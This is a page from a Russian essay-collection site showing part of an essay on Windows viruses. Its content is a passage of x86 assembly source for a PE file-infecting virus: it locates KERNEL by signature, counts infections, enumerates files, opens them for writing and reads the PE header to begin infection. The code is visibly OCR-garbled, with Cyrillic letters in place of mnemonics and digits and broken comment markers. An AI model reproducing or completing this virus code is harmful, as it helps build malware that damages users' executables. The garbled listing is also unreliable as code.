Рефераты | Рефераты по информатике, программированию | Вирусы под Windows | страница реферата 21 | Большая Энциклопедия Рефератов от А до Я
Большая Энциклопедия Рефератов от А до Я
  • Рефераты, курсовые, шпаргалки, сочинения, изложения
  • Дипломы, диссертации, решебники, рассказы, тезисы
  • Конспекты, отчеты, доклады, контрольные работы


    • Рефераты | Рефераты по информатике, программированию | Вирусы под Windows


    Рефераты | Рефераты по информатике, программированию | Вирусы под Windows

    Вирусы под Windows




    Категория реферата: Рефераты по информатике, программированию
    Теги реферата: возраст реферат, доклад по обществознанию
    Добавил(а) на сайт: Jandukin.



    Предыдущая страница реферата | 16  17  18  19  20  21  22  23  24  25  26 |



    ;Сохраним адрес в стеке
    push eax

    [Вычислим стартовый адрес вирусного кода
    sub ebp.offset recalc

    .Ищем KERNEL. Возьмем вторую известную нам точку KERNEL
    mov eax,[ebp+offset kern2]

    Проверим ключ. Если ключа нет, перейдем к точке 1
    cmp dword ptr [eax],5350FC9Ch
    jnz notkern2

    ;KERNEL найден, точка 2

    mov eax,[ebp+offset kern2]
    jmp movit

    ;Точка 2 не подошла, проверим точку 1
    notkern2:

    ;Возьмем адрес первой известной нам точки KERNEL
    mov eax,[ebp+offset kern1]

    Проверим ключ, если ключа нет - выходим
    cmp dword ptr [eax],5350FC9Ch
    jnz nopayload

    ;KERNEL найден, точка 1

    mov eax,[ebp+offset kern1]

    ;KERNEL найден, адрес точки входа находится в регистре EAX
    movit:

    .Сохраним адрес KERNEL
    mov [ebp+offset kern].eax
    eld

    ;3апомним текущую директорию
    lea eax, [ebp+offset orgdir]
    push eax
    push 255
    call GetCurDir

    ; Инициализируем счетчик заражений

    mov byte ptr [ebp+offset countinfect],0

    ;Ищем первый файл
    infectdir:

    lea eax, [ebp+offset win32_data_thang]

    push eax

    lea eax, [ebp+offset fname]

    push eax

    call FindFile

    ;Сохраним индекс для поиска

    mov dword ptr [ebp+offset searchhandle],eax

    .Проверим, найден ли файл. Если файл не найден,
    .меняем директорию

    стр еах,-1

    jz foundnothing

    [Откроем файл для чтения и записи
    gofile:

    push О

    push dword ptr [ebp+offset fileattr] ;FILE_ATTRIBUTE_NORMAL

    push 3 ;OPEN_EXISTING

    push 0

    push 0

    push 80000000h+40000000h ;GENERIC_READ+GENERIC_WRITE

    lea eax, [ebp+offset fullname]

    push eax

    call CreateFile

    .Сохраним описатель файла

    mov dword ptr [ebp+offset ahandj.eax

    Проверим, не произошла ли ошибка.
    .Если ошибка произошла, ищем следующий файл

    стр еах,-1

    jz findnextone

    .Поставим указатель позиции чтения/записи на поле
    ;со смещением РЕ-заголовка

    push О

    push О

    push 3Ch

    push dword ptr [ebp+offset ahand]

    call SetFilePointer

    ;Считаем адрес РЕ-заголовка
    push О

    lea eax,[ebp+offset bytesread]
    push eax
    push 4


    Рекомендуем скачать другие рефераты по теме: оценка курсовой работы, конспект урока по русскому языку.



    Предыдущая страница реферата | 16  17  18  19  20  21  22  23  24  25  26 |




    Поделитесь этой записью или добавьте в закладки

       

    Категории:



    Разделы сайта




    •